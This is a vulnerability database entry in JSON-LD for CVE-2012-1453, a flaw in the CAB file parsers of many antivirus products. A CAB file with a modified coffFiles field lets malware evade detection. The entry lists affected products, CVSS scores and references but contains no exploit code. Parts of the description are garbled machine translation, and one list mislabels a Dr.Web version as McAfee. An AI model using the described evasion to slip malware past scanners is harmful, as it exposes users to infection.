Vulnerability from variot - Updated: 2023-12-18 12:10The CAB file parser in Dr.Web 5.0.2.03300, Trend Micro HouseCall 9.120.0.1004, Kaspersky Anti-Virus 7.0.0.125, Sophos Anti-Virus 4.61.0, Trend Micro AntiVirus 9.120.0.1004, McAfee Gateway (formerly Webwasher) 2010.1C, Emsisoft Anti-Malware 5.1.0.1, CA eTrust Vet Antivirus 36.1.8511, Antiy Labs AVL SDK 2.0.3.7, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, Rising Antivirus 22.83.00.03, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Fortinet Antivirus 4.2.254.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via a CAB file with a modified coffFiles field. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different CAB parser implementations. Multiple products CAB The file parser contains a vulnerability that can bypass malware detection. CVE May be split intoChanged by a third party coffFiles Have fields CAB Via files, malware detection can be bypassed. Successful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. The following products are affected: McAfee 5.0.2.03300 TrendMicro-HouseCall 9.120.0.1004 Kaspersky 7.0.0.125 Sophos 4.61.0 TrendMicro 9.120.0.1004 McAfee-GW-Edition 2010.1C Emsisoft 5.1.0.1 eTrust-Vet 36.1.8511 Antiy-AVL 2.0.3.7 Microsoft 1.6402, Rising 22.83.00.03 Ikarus T3.1.1.97.0 Fortinet 4.2.254.0 Panda 10.0.2.7
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201203-0377",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "anti-virus",
"scope": "eq",
"trust": 2.1,
"vendor": "kaspersky",
"version": "7.0.0.125"
},
{
"model": "avl sdk",
"scope": "eq",
"trust": 1.8,
"vendor": "antiy",
"version": "2.0.3.7"
},
{
"model": "etrust vet antivirus",
"scope": "eq",
"trust": 1.8,
"vendor": "ca",
"version": "36.1.8511"
},
{
"model": "anti-malware",
"scope": "eq",
"trust": 1.8,
"vendor": "emsisoft",
"version": "5.1.0.1"
},
{
"model": "virus utilities t3 command line scanner",
"scope": "eq",
"trust": 1.8,
"vendor": "ikarus",
"version": "1.1.97.0"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.8,
"vendor": "sophos",
"version": "4.61.0"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 1.8,
"vendor": "fortinet",
"version": "4.2.254.0"
},
{
"model": "security essentials",
"scope": "eq",
"trust": 1.8,
"vendor": "microsoft",
"version": "2.0"
},
{
"model": "panda antivirus",
"scope": "eq",
"trust": 1.6,
"vendor": "pandasecurity",
"version": "10.0.2.7"
},
{
"model": "trend micro antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "trendmicro",
"version": "9.120.0.1004"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "rising global",
"version": "22.83.00.03"
},
{
"model": "gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "2010.1c"
},
{
"model": "housecall",
"scope": "eq",
"trust": 1.0,
"vendor": "trendmicro",
"version": "9.120.0.1004"
},
{
"model": "dr.web antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "drweb",
"version": "5.0.2.03300"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.8,
"vendor": "rising",
"version": "22.83.00.03"
},
{
"model": "dr.web antivirus",
"scope": "eq",
"trust": 0.8,
"vendor": "doctor web",
"version": "5.0.2.03300"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.8,
"vendor": "panda security",
"version": "10.0.2.7"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.8,
"vendor": "trend micro",
"version": "9.120.0.1004"
},
{
"model": "housecall",
"scope": "eq",
"trust": 0.8,
"vendor": "trend micro",
"version": "9.120.0.1004"
},
{
"model": "web gateway software",
"scope": "eq",
"trust": 0.8,
"vendor": "mcafee",
"version": "2010.1c"
},
{
"model": "trend micro",
"scope": "eq",
"trust": 0.3,
"vendor": "trend micro",
"version": "9.1201004"
},
{
"model": "housecall",
"scope": "eq",
"trust": 0.3,
"vendor": "trend micro",
"version": "9.1201004"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 0.3,
"vendor": "sophos",
"version": "4.61"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "rising",
"version": "22.8303"
},
{
"model": "cat-quickheal",
"scope": "eq",
"trust": 0.3,
"vendor": "quick heal",
"version": "11.00"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "panda",
"version": "10.0.27"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "1.6402"
},
{
"model": "mcafee-gw-edition 2010.1c",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "mcafee",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "5.0.2.03300"
},
{
"model": "antivirus t3.1.1.97.0",
"scope": null,
"trust": 0.3,
"vendor": "ikarus",
"version": null
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.2.2540"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "emsisoft",
"version": "5.11.0"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "emsisoft",
"version": "5.11"
},
{
"model": "associates etrust vet antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "36.1.8511"
},
{
"model": "antiy-avl",
"scope": "eq",
"trust": 0.3,
"vendor": "antiy",
"version": "2.0.37"
}
],
"sources": [
{
"db": "BID",
"id": "52621"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001867"
},
{
"db": "NVD",
"id": "CVE-2012-1453"
},
{
"db": "CNNVD",
"id": "CNNVD-201203-416"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:mcafee:gateway:2010.1c:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:emsisoft:anti-malware:5.1.0.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:pandasecurity:panda_antivirus:10.0.2.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:drweb:dr.web_antivirus:5.0.2.03300:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:trendmicro:housecall:9.120.0.1004:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:security_essentials:2.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:rising-global:rising_antivirus:22.83.00.03:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_vet_antivirus:36.1.8511:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:antiy:avl_sdk:2.0.3.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:trendmicro:trend_micro_antivirus:9.120.0.1004:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:kaspersky:kaspersky_anti-virus:7.0.0.125:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:4.61.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ikarus:ikarus_virus_utilities_t3_command_line_scanner:1.1.97.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:fortinet:fortinet_antivirus:4.2.254.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2012-1453"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Suman Jana and Vitaly Shmatikov",
"sources": [
{
"db": "BID",
"id": "52621"
}
],
"trust": 0.3
},
"cve": "CVE-2012-1453",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2012-1453",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-54734",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2012-1453",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201203-416",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-54734",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54734"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001867"
},
{
"db": "NVD",
"id": "CVE-2012-1453"
},
{
"db": "CNNVD",
"id": "CNNVD-201203-416"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The CAB file parser in Dr.Web 5.0.2.03300, Trend Micro HouseCall 9.120.0.1004, Kaspersky Anti-Virus 7.0.0.125, Sophos Anti-Virus 4.61.0, Trend Micro AntiVirus 9.120.0.1004, McAfee Gateway (formerly Webwasher) 2010.1C, Emsisoft Anti-Malware 5.1.0.1, CA eTrust Vet Antivirus 36.1.8511, Antiy Labs AVL SDK 2.0.3.7, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, Rising Antivirus 22.83.00.03, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Fortinet Antivirus 4.2.254.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via a CAB file with a modified coffFiles field. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different CAB parser implementations. Multiple products CAB The file parser contains a vulnerability that can bypass malware detection. CVE May be split intoChanged by a third party coffFiles Have fields CAB Via files, malware detection can be bypassed. \nSuccessful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. \nThe following products are affected:\nMcAfee 5.0.2.03300\nTrendMicro-HouseCall 9.120.0.1004\nKaspersky 7.0.0.125\nSophos 4.61.0\nTrendMicro 9.120.0.1004\nMcAfee-GW-Edition 2010.1C\nEmsisoft 5.1.0.1\neTrust-Vet 36.1.8511\nAntiy-AVL 2.0.3.7\nMicrosoft 1.6402,\nRising 22.83.00.03\nIkarus T3.1.1.97.0\nFortinet 4.2.254.0\nPanda 10.0.2.7",
"sources": [
{
"db": "NVD",
"id": "CVE-2012-1453"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001867"
},
{
"db": "BID",
"id": "52621"
},
{
"db": "VULHUB",
"id": "VHN-54734"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2012-1453",
"trust": 2.8
},
{
"db": "BID",
"id": "52621",
"trust": 1.4
},
{
"db": "OSVDB",
"id": "80487",
"trust": 1.1
},
{
"db": "OSVDB",
"id": "80482",
"trust": 1.1
},
{
"db": "OSVDB",
"id": "80484",
"trust": 1.1
},
{
"db": "OSVDB",
"id": "80483",
"trust": 1.1
},
{
"db": "OSVDB",
"id": "80489",
"trust": 1.1
},
{
"db": "OSVDB",
"id": "80486",
"trust": 1.1
},
{
"db": "OSVDB",
"id": "80488",
"trust": 1.1
},
{
"db": "OSVDB",
"id": "80485",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001867",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201203-416",
"trust": 0.7
},
{
"db": "BUGTRAQ",
"id": "20120319 EVASION ATTACKS EXPOLITING FILE-PARSING VULNERABILITIES IN ANTIVIRUS PRODUCTS",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-54734",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54734"
},
{
"db": "BID",
"id": "52621"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001867"
},
{
"db": "NVD",
"id": "CVE-2012-1453"
},
{
"db": "CNNVD",
"id": "CNNVD-201203-416"
}
]
},
"id": "VAR-201203-0377",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-54734"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:10:08.012000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "AVL SDK",
"trust": 0.8,
"url": "http://www.antiy.net/en/avlsdk.html"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.rising-global.com/"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.vet.com.au/"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.drweb.co.jp/"
},
{
"title": "Emsisoft Anti-Malware",
"trust": 0.8,
"url": "http://www.emsisoft.com/en/software/antimalware/"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.fortinet.com/"
},
{
"title": "IKARUS virus.utilities",
"trust": 0.8,
"url": "http://www.ikarus.at/en/ngo-gov/products/virus_utilities/index.html"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.ps-japan.co.jp/"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://jp.trendmicro.com/jp/home/"
},
{
"title": "Trend Micro HouseCall",
"trust": 0.8,
"url": "http://jp.trendmicro.com/jp/tools/housecall/"
},
{
"title": "Kaspersky Anti-Virus",
"trust": 0.8,
"url": "http://www.kaspersky.com/kaspersky_anti-virus"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.sophos.com"
},
{
"title": "Microsoft Security Essentials",
"trust": 0.8,
"url": "http://windows.microsoft.com/ja-jp/windows/products/security-essentials"
},
{
"title": "McAfee Web Gateway",
"trust": 0.8,
"url": "http://www.mcafee.com/japan/products/web_gateway.asp"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-001867"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54734"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001867"
},
{
"db": "NVD",
"id": "CVE-2012-1453"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/522005"
},
{
"trust": 1.7,
"url": "http://www.ieee-security.org/tc/sp2012/program.html"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/bid/52621"
},
{
"trust": 1.1,
"url": "http://osvdb.org/80482"
},
{
"trust": 1.1,
"url": "http://osvdb.org/80483"
},
{
"trust": 1.1,
"url": "http://osvdb.org/80484"
},
{
"trust": 1.1,
"url": "http://osvdb.org/80485"
},
{
"trust": 1.1,
"url": "http://osvdb.org/80486"
},
{
"trust": 1.1,
"url": "http://osvdb.org/80487"
},
{
"trust": 1.1,
"url": "http://osvdb.org/80488"
},
{
"trust": 1.1,
"url": "http://osvdb.org/80489"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1453"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-1453"
},
{
"trust": 0.3,
"url": "http://www.antiy.net"
},
{
"trust": 0.3,
"url": "http://www.ca.com"
},
{
"trust": 0.3,
"url": "http://www.emsisoft.com/en/software/antimalware/"
},
{
"trust": 0.3,
"url": "http://seclists.org/bugtraq/2012/mar/88"
},
{
"trust": 0.3,
"url": "http://www.fortinet.com/"
},
{
"trust": 0.3,
"url": "http://www.ikarus.at"
},
{
"trust": 0.3,
"url": "http://www.kaspersky.com/"
},
{
"trust": 0.3,
"url": "http://www.mcafee.com/"
},
{
"trust": 0.3,
"url": "http://www.microsoft.com"
},
{
"trust": 0.3,
"url": "http://www.pandasecurity.com/usa/"
},
{
"trust": 0.3,
"url": "http://www.quickheal.co.in/default.asp"
},
{
"trust": 0.3,
"url": "http://www.rising-global.com/"
},
{
"trust": 0.3,
"url": "http://www.sophos.com/"
},
{
"trust": 0.3,
"url": "http://www.trend.com"
},
{
"trust": 0.3,
"url": "/archive/1/522005"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54734"
},
{
"db": "BID",
"id": "52621"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001867"
},
{
"db": "NVD",
"id": "CVE-2012-1453"
},
{
"db": "CNNVD",
"id": "CNNVD-201203-416"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-54734"
},
{
"db": "BID",
"id": "52621"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001867"
},
{
"db": "NVD",
"id": "CVE-2012-1453"
},
{
"db": "CNNVD",
"id": "CNNVD-201203-416"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-03-21T00:00:00",
"db": "VULHUB",
"id": "VHN-54734"
},
{
"date": "2012-03-20T00:00:00",
"db": "BID",
"id": "52621"
},
{
"date": "2012-03-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-001867"
},
{
"date": "2012-03-21T10:11:48.847000",
"db": "NVD",
"id": "CVE-2012-1453"
},
{
"date": "2012-03-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201203-416"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-11-06T00:00:00",
"db": "VULHUB",
"id": "VHN-54734"
},
{
"date": "2012-03-30T16:10:00",
"db": "BID",
"id": "52621"
},
{
"date": "2012-03-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-001867"
},
{
"date": "2012-11-06T05:09:05.987000",
"db": "NVD",
"id": "CVE-2012-1453"
},
{
"date": "2012-04-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201203-416"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201203-416"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple products CAB Vulnerability to bypass malware detection in file parser",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-001867"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201203-416"
}
],
"trust": 0.6
}
}